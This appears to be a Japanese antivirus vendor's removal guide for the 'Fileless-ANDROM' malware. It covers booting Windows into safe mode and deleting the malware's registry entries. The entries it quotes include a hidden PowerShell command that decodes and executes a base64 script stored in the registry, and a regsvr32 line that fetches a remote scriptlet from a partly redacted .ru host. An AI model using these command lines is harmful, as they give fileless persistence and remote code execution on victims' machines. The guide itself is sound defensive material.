Fileless-ANDROM

セーフモードでの起動：

• Windows 2000 の場合：

1. コンピュータを起動させます。
2. 「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
3. 「Windows 拡張オプション メニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows XP の場合：

1. コンピュータを起動させます。
2. 「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
3. 「Windows 拡張オプション メニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows Server 2003 の場合：

1. コンピュータを起動させます。
2. 「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
3. 「Windows 拡張オプション メニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows Vista、Windows 7 および Windows Server 2008 の場合：

1. コンピュータを起動させます。
2. 「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
3. 「詳細ブート オプション」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows 8、8.1 および Server 2012の場合：

1. 画面の右上隅へマウスポインタを移動し、[チャーム]バーを表示します。
2. マウスで、[設定]－[PC設定の変更]を選択します。
3. 左側のパネルで、[全般]を選択します。
4. 右側のパネルで、[PCの起動をカスタマイズする]が表示されるまで下にスクロールし、[今すぐ再起動]をクリック。コンピュータが再起動するまで待ちます。
5. [オプションの選択]メニューで、[トラブルシューティング]－[詳細オプション]－[スタートアップ設定]－[再起動]をクリックします。
6. [スタートアップ設定]メニューで、[4]キーを押し、「4）セーフモードを有効にする」を選択します。

追加されたレジストリ値の削除：

1. 「レジストリエディタ」を起動します。
   
   • Windows 2000、XP および Server 2003 の場合:
     [スタート]-[ファイル名を指定して実行]を選択し、regedit と入力し、Enter を押します。
   • Windows Vista、7、Server 2008 の場合：
     [スタート]をクリックし、検索入力欄に regedit と入力し、Enter を押します。
   • Windows 8、8.1 および Server 2012 の場合：
     画面の左下隅を右クリックし、[ファイル名を指定して実行]を選択します。入力ボックスに regedit と入力し、Enter を押します。
   ※regedit は半角英数字で入力する必要があります（大文字／小文字は区別されません）。
2. 「レジストリエディタ」の左側のパネルにある以下のフォルダをダブルクリックします。
   HKEY_CURRENT_USER>Software>Microsoft>Windows>CurrentVersion>Run
3. 右側のパネルで以下のレジストリ値を検索し、削除します。
   {UID} = "%System%\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\{random character}').{random character})));"
4. 「レジストリエディタ」の左側のパネルにある以下のフォルダをダブルクリックします。
   HKEY_CURRENT_USER>Software>Classes>{random characters}
5. 右側のパネルで以下のレジストリ値を検索し、削除します。
   {random characters} = {base 64 encoded powershell command}
6. 右側のパネルで以下のレジストリ値を検索し、削除します。
   {UID} = {encrypted binary data}
7. 「レジストリエディタ」の左側のパネルにある以下のフォルダをダブルクリックします。
   HKEY_CURRENT_USER>Console>%SystemRoot%>_system32_WIndowsPowerShell_v1.0_powershell.exe
8. 右側のパネルで以下のレジストリ値を検索し、削除します。
   WindowPosition = 4294905760
9. 右側のパネルで以下のレジストリ値を検索し、削除します。
   ScreenBufferSize = 65616
10. 右側のパネルで以下のレジストリ値を検索し、削除します。
    WindowSize = 65616
11. 「レジストリエディタ」の左側のパネルにある以下のフォルダをダブルクリックします。
    HKEY_USERS>{SID}>Software>Microsoft>Windows>CurrentVersion>Run
12. 右側のパネルで以下のレジストリ値を検索し、削除します。
    COM+ = "regsvr32 /s /n /u /i:http://{BLOCKED}2.{BLOCKED}3bw.ru/restore.xml scrobj.dll"
13. 「レジストリエディタ」を閉じます。